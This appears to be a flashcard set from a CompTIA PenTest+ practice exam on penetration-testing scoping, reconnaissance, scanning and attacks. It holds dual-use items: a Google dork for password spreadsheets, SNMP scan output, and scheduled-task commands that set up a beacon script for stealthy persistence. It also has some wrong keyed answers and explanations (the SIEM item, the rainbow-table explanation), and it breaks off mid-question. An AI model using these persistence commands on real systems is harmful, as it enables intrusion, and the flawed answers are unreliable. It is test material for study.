CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dions 1of6) Flashcards

Question 1

Q

Dion Training hosts its new web applications on AWS Lambda. You have been contracted to perform a penetration test against this new web application. What target type would this engagement be classified as?

A.On-Site
B.Internal
C.First-party hosted
D.Third-party hosted

Answer

A

D.Third-party hosted

Explanation:

OBJ-1.3: Third-party hosted target types are used when a vendor or partner of the client organization hosts the targeted network or system. In this scenario, Dion Training uses AWS Lambda for hosting its web application. Therefore, this is classified as a third-party hosted target type. This is important to consider before beginning the assessment since the third-party also must consent and agree to the penetration test since they host the systems involved.

Question 2

Q

You are planning an engagement with a new client. Which target type should be selected to simulate an APT?

A.Internal
B.On-site
C.Third-party hosted
D.External

Answer

A

D.External

Explanation:
OBJ-1.3: An advanced persistent threat (APT) is a threat that uses multiple attack vectors to gain unauthorized access to sensitive resources. APTs are often funded by nation-states and used for intelligence-gathering operations against the government, military, and commercial networks. In general, APT attacks as an external target type.

Question 3

Q

Which of the following directly impacts the budgetary requirements of a penetration test?

A.Scope
B.Compliance
C.Schedule
D.Tolerance to Impact

Answer

A

A.Scope

Explanation:
OBJ-1.1: The scope has a direct impact on the budgetary requirements of a penetration test. If the scope is smaller, the budget required will be lower. If the scope is larger, then the budget also needs to be larger to support it. The scope can drive the cost, but often a fixed budget is already provided by an organization. In this case, the budget will remain constant, but the scope will shrink to fit within the resources available.

Question 4

Q

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?

A.There are no new risks due to the install and the company has a stronger physical security posture
B.These devices should be isolated from the rest of the enterprise network
C.These devices should be scanned for viruses before installation
D.These devices are insecure and should be isolated from the internet

Answer

A

B.These devices should be isolated from the rest of the enterprise network

Explanation:
OBJ-1.3: While the physical security posture of the company has definitely been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and lock on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

Question 5

Q

What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software?

A.XCCDF
B.CPE
C.CCE
D.CVE

Answer

A

D.CVE

Explanation:
OBJ-2.1: The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

Question 6

Q

Which of the following is a special type of embedded operating system that uses a predictable and consistent scheduler?
A.Mobile
B.IoT
C.RTOS
D.PoS

Answer

A

C.RTOS

Explanation:
OBJ-2.5: A real-time operating system (RTOS) is a special type of embedded OS. An RTOS ideal for embedded systems because they tend to have strict requirements for when a task should be completed and do not have particularly taxing workloads. An RTOS uses a predictable and consistent scheduler, unlike a general-purpose OS like Windows or macOS.

Question 7

Q

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company?

A.WHOIS looksups
B.Banner grabbing
C.BGP Looking Glass
D. Registrar Checks

Answer

A

B.Banner grabbing

Explanation:
OBJ-2.1: Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization’s remote host.

Question 8

Q

David noticed that port 3389 was open on one of the POS terminals in a store during a scheduled PCI compliance scan. Based on the scan results, what service should he expect to find enabled on this terminal?
A.MySQL
B.RDP
C.LDAP
D.IMAP

Answer

A

B.RDP

Explanation:
OBJ-2.5: Port 3389 is an RDP port used for the Remote Desktop Protocol. If this port isn’t supposed to be opened, then an incident response plan should be the next step since this can be used for remote access by an attacker. MySQL runs on port 3306. LDAP runs on port 389. IMAP over SSL runs on port 993.

Question 9

Q

Which of the following is the most difficult to confirm with an external vulnerability scan?
A.Cross-site Scripting (XSS)
B.Cross-site Request Forgery (XSRF/CSRF)
C.Blind SQL Injection
D.Unpatched web server

Answer

A

C.Blind SQL Injection

Explanation:
OBJ-2.2: Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.

Question 10

Q

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and saw them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE)

A.All search filters are deactivated
B.Returns only files hosted at diontraining.com
C.Returns only Microsoft Excel spreadsheets
D.Find sites related to diontraining.com
E.Excludes Microsoft Excel Spreadsheets
F.Personalization is turned off

Answer

A

B.Returns only files hosted at diontraining.com
C.Returns only Microsoft Excel spreadsheets
F.Personalization is turned off

Explanation:
OBJ-2.1: The above example searches for files with the name “password” in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ‘:’) and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the “related:” term to the query. To deactivate all filters from the search, the “filter=0” should be used. To deactivate the directory filtering function, the “filter=p” is used.

Question 11

Q

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital’s enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital’s elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend?

A.Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack
B.Recommend isolation of the elevator control system from the rest of the production network through the change control process
C.Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists
D.Recommend immediate disconnection of the elevators control system from the enterprise network

Answer

A

B.Recommend isolation of the elevator control system from the rest of the production network through the change control process

Explanation:
OBJ-2.5: The best recommendation is to conduct the elevator control system’s logical or physical isolation from the rest of the production network and the internet. This should be done through the change control process that brings the appropriate stakeholders together to discuss the best way to mitigate the vulnerability to the elevator control system that defines the business impact and risk of the decision. Sudden disconnection of the PLCs from the rest of the network might have disastrous results (i.e., sick and injured trapped in an elevator) if there were resources that the PLCs were dependent on in the rest of the network. Replacement of the elevators may be prohibitively expensive, time-consuming, and likely something that the hospital would not be able to justify to mitigate this vulnerability. Attempting further exploitation of the buffer overflow vulnerability might inadvertently trap somebody in an elevator or cause damage to the elevators themselves.

Question 12

Q

An organization is currently accepting bids for a contract that will involve penetration testing and reporting. The organization is asking all bidders to provide proof of previous penetration testing and reporting experience. One contractor decides to print out a few reports from some previous penetration tests that they performed. What could have occurred as a result of this contractor’s actions?

A.The contractor will have their bid accepted with a special pay bonus because of their excellent work on previous pentests
B.The contractor may have inadvertently exposed numerous vulnerabilities they have found at other companies on previous assessments
C.The organization accepting the bids will want to use the reports as an example of the format for all bidders to use in the future
D.The company accepting the bids will hire the contractor because of the quality of the reports he submitted with this bid

Answer

A

B.The contractor may have inadvertently exposed numerous vulnerabilities they have found at other companies on previous assessments

Explanation:
OBJ-1.2: Pentesters should never disclose any information from previous penetration tests to anyone outside of the assessed organization since this could expose the vulnerability found. This non-disclosure is usually outlined in the original contract and scope of work. If the contractor wishes to provide a sample report, then the report should be created specifically for the contract and only include information from a sample/test network, not a previous customer’s assessment. This could also be in breach of the NDA between the pentester and the organization, as well.

Question 13

Q

Dion Training has contracted you to conduct a penetration test of its web application hosted within AWS Lamba. Part of the assessment will include stress testing the web application using a simulated DDoS attack. Which of the following entities would be the proper signing authority for this penetration test?

A.Dion Training’s representative since they hired you
B.Amazon’s representative since they host the servers
C.Both organizations representatives since one is your client and the other hosts the servers
D.Neither organizations representatives since your are simulating a DDoS

Answer

A

C.Both organizations representatives since one is your client and the other hosts the servers

Explanation:
OBJ-1.2: Written authorization documents help control the amount of liability incurred by the penetration tester. You must ensure you have the correct authorization in place before beginning your engagement. You ALWAYS need written authorization from your client. If the client uses a third-party service provider, then you may need to also get proper authorization from them in writing too. During your engagement planning, you should contact the third-party service provider to determine if written consent is required. In the case of Amazon, there are a handful of services that do not require prior authorization before conducting a penetration test on behalf of your client. DoS and DDoS attacks and simulations do require written authorization from both your client and Amazon. If you do not have this, you could be held liable for any negative consequences to Amazon and its client’s servers or even be charged with criminal computer hacking.

Question 14

Q

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft’s regular patch. Which of the following options would be best to ensure the system remains protected and are compliant with the rules outlined by the PCI DSS?

A.Replace the Windows POS terminals with standard Windows systems
B.Build a custom OS image that includes the patch
C.Identify, implement and document compensating controls
D.Remove the POS terminals from the network until the vendor releases a patch

Answer

A

C.Identify, implement and document compensating controls

Explanation
OBJ-1.4: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

Question 15

Q

You are working as a penetration tester and have discovered a new method of exploiting a vulnerability within the Windows 10 operating system. You conduct some research online and discover that a security patch against this particular vulnerability doesn’t exist yet. Which type of threat would this BEST be categorized as?

A.Zero-day
B.DDoS
C.Brute force
D.Spoofing

Answer

A

A.Zero-day

Explanation:
OBJ-1.3: A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited, and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability, hence the term zero-day.

Question 16

Q

You have been contracted to perform a web application assessment. You believe the best way to exploit the application is to provide it a specially crafted XML file. The application normally allows users to import XML-based files and then parses them during ingestion. Which of the following support resources should you request from the organization before starting your assessment?

A.Soap Project File
B.Architectural diagrams
C,Authorization to use a fuzzer
D.An XSD file

Answer

A

D.An XSD file

Explanation:
OBJ-1.1: Since the scenario states that you will create a specially crafted XML file for the assessment, you will need to know the XML file structure the web application expects. An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents. If the company provides this support resource to you, you will know the exact format expected by the application, which can save you a lot of time, and the organization a lot of expense during the assessment.

Question 17

Q

A project manager is tasked with the planning of a new network installation. The customer requires that everything discussed in the meetings is installed and configured when a network engineer arrives onsite. Which document should the project manager provide the customer?

A.Acceptable Use Policy
B.Service Level Agreement
C.Statement of Work
D.Security Policy

Answer

A

C.Statement of Work

Explanation:
OBJ-1.2: A Statement of Work (SOW) is a document that outlines all the work that is to be performed, as well as the agreed-upon deliverables and timelines.

Question 18

Q

An organization wants to get an external attacker’s perspective on their security status. Which of the following services should they purchase?

A.Vulnerability Scan
B.Asset Management
C.Pentest
D.Patch Management

Answer

A

C.Pentest

Explanation:
OBJ-1.4: Penetration tests provide an organization with an external attacker’s perspective on their security status. The NIST process for penetration testing divides tests into four phases: planning, discovery, attack, and reporting. The penetration test results are valuable security planning tools, as they describe the actual vulnerabilities that an attacker might exploit to gain access to a network. A vulnerability scan provides an assessment of your security posture from an internal perspective. Asset management refers to a systematic approach to the governance and realization of value from the things that a group or entity is responsible for over their whole life cycles. It may apply both to tangible assets and intangible assets. Patch management is the process that helps acquire, test, and install multiple patches (code changes) on existing applications and software tools on a computer, enabling systems to stay updated on existing patches and determining which patches are the appropriate ones.

Question 19

Q

Which of the following rules of engagement provides the scope and limitation of the penetration test?

A.Timeline
B.Location of the team
C.Temporal restrictions
D.Test boundaries

Answer

A

D.Test boundaries

Explanation:
OBJ-1.1: The test boundaries are used to define the acceptable actions and scope used during an engagement. For example, it will define whether servers, endpoints, or both will be in the scope of the attack. It may also dictate whether only technical means may be used for exploitation or if social engineering can also be utilized.

Question 20

Q

Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of activity occurred based on the output above?

A.Port scan targeting 10.10.3.2
B.Fragmentation attack targeting 10.10.3.6
C.Denial of service attack targeting 10.10.3.6
D.Port scan targeting 10.10.3.6

Answer

A

D.Port scan targeting 10.10.3.6

Explanation:
OBJ-2.1: Port Scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making “Port scan targeting 10.10.3.6” the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.

Question 21

Q

A new alert has been distributed throughout the information security community regarding a critical Apache vulnerability. What action could you take to ONLY identify the known vulnerability?

A.Perform an unauthenticated vulnerability scan on all servers in the environment
B.Perform a scan for the specific vulnerability on all web servers
C.Perform a web vulnerability scan on all servers in the environment
D.Perform an authenticated scan on all web servers in the environment

Answer

A

B.Perform a scan for the specific vulnerability on all web servers

Explanation:
OBJ-2.2: Since you wish to check for only the known vulnerability, you should scan for that specific vulnerability on all web servers. All web servers are chosen because Apache is a web server application. While performing an authenticated scan of all web servers or performing a web vulnerability scan of all servers would also find these vulnerabilities, it is a much larger scope. It would waste time and processing power by conducting these scans instead of properly scoping the scans based on your needs. Performing unauthenticated vulnerability scans on all servers is also too large in scope (all servers) while also being less effective (unauthenticated scan).

Question 22

Q

What is the BEST explanation for why consumer-based IoT devices are less secure than traditional desktops and servers?

A.IoT devices are unable to received patches and updates
B.IoT devices focus convenience more than security
C.IoT devices are not powerful enough to support encryption
D.IoT devices are only used in low security cases

Answer

A

B.IoT devices focus convenience more than security

Explanation:
OBJ-2.5: IoT device manufacturers are more focused on making the devices convenient to use instead of ensuring they have strong security. The other options are incorrect and not true. IoT devices can receive patches and updates through an over-the-air firmware update if a manufacturer creates the patches. IoT devices are powerful these days, and they can support encryption and other security features if manufacturers would add them to their code. IoT devices are not just used in low-security use cases, either. For example, IoT devices are often used as life-saving devices in hospitals or security systems in our homes. Unfortunately, IoT devices are notoriously lax when it comes to security. Some IoT systems may even allow a user full remote control of a device.

Question 23

Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A.Man-in-the-middle attack
B.Brute-force attack
C.Dictionary attack
D.Session hijacking

Answer

A

C.Dictionary attack

Explanation:
OBJ-2.4: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

Question 24

Q

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
# nmap diontraining012

Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports

PORT STATE
135/tcp open
139/tcp open
445/tcp open

Based on these results, which of the following operating system is most likely being run by this workstation?

A.Ubuntu
B.macOS
C.CentOS
D.Windows

Answer

A

D.Windows

Explanation:
OBJ-2.1: The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.

Question 25

Q

Which of the following is NOT a valid reason to conduct reverse engineering?

A.To commit industrial espionage
B.To determine how a piece of malware operates
C.TO allow the software developer to spot flaws in their source code
D.To allow an attacker to exploit vulnerabilities in an executable

Answer

A

C.TO allow the software developer to spot flaws in their source code

Explanation:
OBJ-2.1: If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information about how the malware propagates and its primary directives. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

Question 26

Q

A system administrator wants to verify that external IP addresses cannot collect software versioning from servers on the network. Which of the following should the system administrator do to confirm the network is protected?

A.Analyze packet captures
B.Utilize netstat to locate active connections
C.Use nmap to query known ports
D.Review the ID3 logs on the network

Answer

A

A.Analyze packet captures

Explanation:
OBJ-2.1: Captured packets show you the information that was traveling through certain files, etc. Packet sniffers detail the information they’ve received, so working through those shows if the external network shows or details software versions.

Question 27

Q

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst?

A.Web application vulnerability scan
B.Database vulnerability scan
C.Port scan
D.Network Vulnerability Scan

Answer

A

A.Web application vulnerability scan

Explanation:
OBJ-2.2: Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn’t contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.

Question 28

Q

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and saw them enter the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A.Returns no useful results from an attacker
B.Returns all web pages containing the text diontraining.com
C.Returns all web pages containing an email address affiliated with diontraining.com
D.Returns all web pages hosted at diontraining.com

Answer

A

C.Returns all web pages containing an email address affiliated with diontraining.com

Explanation:
OBJ-2.1: Google interprets this statement as @diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the “site:” modifier in the query. To return all web pages with the text diontraining.com, enter “diontraining.com” into the Google search bar with no modifiers to return those results.

Question 29

Q

During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst’s vulnerability scans of the network’s domain controllers?

A.Log files
B.SIEM systems
C.Configuration management systems
D.DMARC and DKIM

Answer

A

B.SIEM systems

Explanation:
OBJ-2.1: Vulnerability scans should never take place in a vacuum. Analysts should correlate scan results with other information sources, including logs, SIEM systems, and configuration management systems. DMARC (domain-based message authentication, reporting, and conformance) and DKIM (domain keys identified mail) are configurations performed on a DNS server to verify whether an email is sent by a third-party are verified to send it on behalf of the organization. For example, if you are using a third-party mailing list provider, they need your organization to authorize them to send an email on your behalf by setting up DMARC and DKIM in your DNS records. While this is an important security configuration, it would not be a good source of information to validate the results of an analyst’s vulnerability scans on a domain controller.

Question 30

Q

An attacker is using a precomputed table of values to attempt to crack your Windows password. What type of password attack is this?

A.Rainbow Table
B.Dictionary
C.Hybrid
D.Brute-force

Answer

A

A.Rainbow Table

Explanation:
OBJ-2.4: A rainbow table is a tool for speeding up attacks against Windows passwords by precomputing possible hashes. A rainbow table is used to authenticate users by comparing the hash value of the entered password against the one stored in the rainbow table. Using a rainbow table makes password cracking a lot faster and easier for an attacker.

Question 31

Q

Which of the following weaknesses exist in WPS enabled wireless networks?

A.Utilizes TKIP to secure the authentication handshake
B.Utilizes a 24-bit initialization vector
C.Brute force occurs within 11,000 combinations
D.Utilizes a 40-bit encryption key

Answer

A

C.Brute force occurs within 11,000 combinations

Explanation:
OBJ-3.3: The most prominent attack against WPS enabled wireless networks involves brute-forcing the 8-digit PIN that client uses to enroll their devices without knowing the pre-shared key. WPS checks each half of the PIN individually, reducing the number of possible combinations from a maximum of 100,000,000 to only 11,000. This only takes a few minutes to crack on most modern computers, as long as the WAP doesn’t have a lockout after a certain number of failures. The lockout mechanism may also be triggered based on the client’s MAC, so you can often spoof MAC to bypass this defense.

Question 32

Q

Several users have contacted the help desk to report that they received an email from a well-known bank stating that their accounts have been compromised and they need to “click here” to reset their banking password. Some of these users are not even customers of this particular bank, though. Which of the following social engineering principles is being utilized as a part of this phishing campaign?

A.Intimidation
B.Familiarity
C.Consensus
D.Urgency

Answer

A

B.Familiarity

Explanation:
OBJ-3.1: Familiarity is a social engineering technique that relies on assuming a widely known organization’s persona. For example, in the United States, nearly 25% of Americans have a Bank of America account. For this reason, phishing campaigns often include emails pretending to be from Bank of America since 1 in 4 people who receive the email in the United States are likely to have an account. This makes them familiar with the bank name and is more likely to click on the email link. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

Question 33

Q

A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items’ sale price?

A.SQL injection
B.Changing hidden form values
C.Buffer overflow attack
D.Cross-site scripting

Answer

A

B.Changing hidden form values

Explanation:
OBJ-3.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

Question 34

Q

You are planning to exploit a network-based vulnerability against a Windows server. As part of your planning, you use the auxiliary scanner in Metasploit against the network and receive the following results:

-=-=-=-=-=-
[+] 192.168.1.2 community string: ‘public’ info: ‘GSM7224 L2 Managed Gigabit Switch’
[+] 192.168.1.199 community string: ‘public’ info: ‘HP ETHERNET MULTI-ENVIRONMENT’
[+] 192.168.1.2 community string: ‘private’ info: ‘GSM7224 L2 Managed Gigabit Switch’
[+] 192.168.1.199 community string: ‘private’ info: ‘HP ETHERNET MULTI-ENVIRONMENT’
[] Validating scan results from 2 hosts…
[] Host 192.168.1.199 provides READ-WRITE access with community ‘internal’
[] Host 192.168.1.199 provides READ-WRITE access with community ‘private’
[] Host 192.168.1.199 provides READ-WRITE access with community ‘public’
[] Host 192.168.1.2 provides READ-WRITE access with community ‘private’
[] Host 192.168.1.2 provides READ-ONLY access with community ‘public’
[] Scanned 256 of 256 hosts (100% complete)
[] Auxiliary module execution completed
-=-=-=-=-=-

Based on the output above, which of the following exploits are you preparing to use?

A.SNMP Exploit
B.FTP Exploit
C.SMB Exploit
D.SMTP Exploit

Answer

A

A.SNMP Exploit

Explanation:
OBJ-3.2: SNMP provides a lot of information about different target devices on the network. Based on the output shown, you should identify that this is an SNMP scan based on the “community string” keyword. From your Network+ and Security+ studies, you should remember that SNMP uses community strings as a basic authentication mechanism before allowing you to access a network device’s statistics. In this scan, two devices are found on this network with default public and private community strings. This makes these devices vulnerable to an SNMP attack for further exploitation.

Question 35

Q

Which of the following a characteristic of a Blind SQL Injection vulnerability?

A.Administrator of the vulnerable application cannot see the request to the webserver
B.Application properly filters the user input but it is still vulnerable to code injection in a blind attack
C.Administrator of the affected application does not see an error message during a successful attack
D.An attacker cannot see any of the display errors with information about the injection during a blind attack

Answer

A

D.An attacker cannot see any of the display errors with information about the injection during a blind attack

Explanation:
OBJ-3.4: Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.

Question 36

Q

Which of the following scan types are useful for probing firewall rules?

A.TCP SYN
B.TCP ACK
C.TCP RST
D.XMAS TREE

Answer

A

B.TCP ACK

Explanation:
OBJ-3.2: TCP ACK scans can be used to determine what services are allowed through a firewall. An ACK scan sends TCP packets with only the ACK bit set. Whether ports are open or closed, the target is required to respond with an RST packet. Firewalls that block the probe usually make no response or send back an ICMP destination unreachable error. This distinction allows Nmap to report whether the ACK packets are being filtered. A TCP SYN scan can sometimes be used to determine what ports are filtered. Still, if the firewall is configured to drop packets for disallowed ports instead of sending an RST packet, then a TCP SYN scan will not be able to determine if a firewall was there or if the port was simply unavailable. A target sends a TCP RST packet in response to a TCP ACK scan, but a TCP RST is not a valid type of scan itself. An XMAS Tree scan will set the FIN, PSH, and URG flags in the TCP packet. This is a noisy type of scan and not useful for probing firewall rules.

Question 37

Q

Which of the following type of threats did the Stuxnet attack rely on to cross an airgap between a business and an industrial control system network?

A.Directory traversal
B.Cross-site scripting
C.Removable media
D.Session hijacking

Answer

A

C.Removable media

Explanation:
OBJ-3.1: Airgaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

Question 38

Q

What type of wireless security measure can easily be defeated by a hacker by spoofing their network interface card’s hardware address?

A.MAC filtering
B.WEP
C.Disable SSID broadcast
D.WPS

Answer

A

A.MAC filtering

Explanation:
OBJ-3.2: Wireless access points can utilize MAC filtering to ensure only known network interface cards are allowed to connect to the network. If the hacker changes their MAC address to a trusted MAC address, they can easily bypass this security mechanism. MAC filtering is considered a good security practice as part of a larger defense-in-depth strategy, but it won’t stop a skilled hacker for long. MAC addresses are permanently burned into the network interface card by the manufacturer and serve as the device’s physical address. WEP is the Wired Equivalent Privacy encryption standard, which is considered obsolete in modern wireless networks. WEP can be broken using a brute force attack within just a few minutes by an attacker. Another security technique is to disable the SSID broadcast of an access point. While this prevents the SSID broadcast, a skilled attacker can still find the SSID using discovery scanning techniques. WPS is the WiFi Protected Setup. WPS is used to connect and configure wireless devices to an access point easily.

Question 39

Q

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization’s AAA services manager?

A.SMS should be encrypted to be secure
B.SMS messages may be accessible to attackers via VoIP or other systems
C.SMS should be paired with a third factor
D.SMS is a costly method of providing a second factor of authentication

Answer

A

B.SMS messages may be accessible to attackers via VoIP or other systems

Explanation:
OBJ-3.4: NIST’s SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale.

Question 40

Q

Sarah is conducting a penetration test against Dion Training’s Windows-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?

A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
B.(crontab -l; echo “/20 * * * * /tmp/beacon”)| crontab -
C.schtasks /create /tn beacon /tr /tmp/beacon /sc MINUTE /mo 20 /ru SYSTEM
D.(crontab -l; echo “ * /20 * * * /tmp/beacon”)| crontab -

Answer

A

